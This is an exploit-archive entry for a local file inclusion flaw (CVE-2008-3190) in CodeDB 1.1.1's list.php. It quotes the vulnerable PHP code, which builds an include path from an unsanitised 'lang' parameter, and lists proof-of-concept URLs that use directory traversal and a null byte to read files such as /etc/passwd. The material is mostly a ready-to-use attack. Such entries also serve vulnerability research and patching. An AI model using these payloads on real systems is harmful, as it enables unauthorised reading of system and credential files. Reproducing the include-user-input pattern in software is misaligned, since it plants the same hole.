CodeDB 1.1.1 - 'list.php' Local File Inclusion

Author: cOndemned
type: webapps
platform: php
port: 
date_added: 2008-07-13 
date_updated: 2016-12-13 
verified: 1 
codes: OSVDB-47027;CVE-2008-3190 
tags: 
aliases:  
screenshot_url:  
application_url: 

###############################################################################
#
#   Name    :   CodeDB (list.php lang) Local File Inclusion Vulnerability
#   Author  :   cOndemned
#   Greetz  :   ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################

Source :

    // list.php

    2.  $lang = htmlspecialchars($_GET['lang']);            // ok, but.... for what ? lol

    7.  if(file_exists('templates/'.$lang.'_middle.php'))   // We'll have to cut off rest of filename & extension
	8.      include('templates/'.$lang.'_middle.php');      // Ekhm... pwned ;d


Proof of Concept :

    http://[host]/[codeDB_path]/list.php?lang=../readme.txt%00
    http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd%00
    http://[host]/[codeDB_path]/list.php?lang=../[local_file]%00


EoF.

# milw0rm.com [2008-07-14]